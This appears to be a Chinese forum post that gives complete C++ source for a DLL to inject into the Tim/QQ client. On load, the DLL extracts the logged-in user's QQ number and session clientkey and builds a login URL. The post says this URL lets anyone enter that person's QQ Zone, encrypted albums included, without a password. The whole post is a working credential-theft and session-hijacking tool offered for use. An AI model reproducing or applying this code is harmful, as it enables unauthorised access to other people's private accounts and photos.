- 注册时间
- 2011-3-6
- 最后登录
- 1970-1-1
该用户从未签到
|
编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~
DLL源码:
- // dllmain.cpp : 定义 DLL 应用程序的入口点。
- #include "pch.h"
- #include <stdio.h>
- #include <WTypes.h>
- //定义CTXStringW为BSTR
- typedef BSTR CTXStringW;
- CTXStringW AllocTXString(const wchar_t* lpSrc)
- {
- if (lpSrc == NULL) return NULL;
- BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
- if (bBuffer == NULL) return NULL;
- DWORD dwZero = 0;
- DWORD dwCount = 3;
- DWORD dwLenth = wcslen(lpSrc) + 1;
- memmove(bBuffer + 0 * 4, &dwZero, 4);
- memmove(bBuffer + 1 * 4, &dwCount, 4);
- memmove(bBuffer + 2 * 4, &dwLenth, 4);
- memmove(bBuffer + 3 * 4, &dwLenth, 4);
- wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
- return CTXStringW(bBuffer + 16);
- }
- VOID Steal()
- {
- do {
- HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
- if (hKernelUtil == NULL)
- {
- OutputDebugStringA("Get KernelUtil Module failed \n");
- break;
- }
- PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
- if (PtrGetSelfUin == NULL)
- {
- OutputDebugStringA("Get GetSelfUin Function failed \n");
- break;
- }
- DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
- if (uin == NULL)
- {
- OutputDebugStringA("Invoke GetSelfUin Function failed \n");
- break;
- }
- // Print QQ number
- char szUin[MAX_PATH] = { 0 };
- sprintf(szUin, "%d", uin);
- PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
- if (GetSignature == NULL)
- {
- OutputDebugStringA("Get GetSignature Function failed \n");
- break;
- }
- WCHAR wsBuffer[MAX_PATH] = { 0 };
- CTXStringW ClientKey = AllocTXString(wsBuffer);
- PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
- if (res == NULL)
- {
- OutputDebugStringA("Invoke GetSignature Function failed \n");
- break;
- }
- // 复制下面链接,无需密码,进入QQ空间
- char msg[MAX_PATH] = { 0 };
- sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
- OutputDebugStringA(msg);
- } while (0);
- }
- BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
- {
- switch (ul_reason_for_call)
- {
- case DLL_PROCESS_ATTACH:
- Steal();
- break;
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- case DLL_PROCESS_DETACH:
- break;
- }
- return TRUE;
- }
复制代码 |
|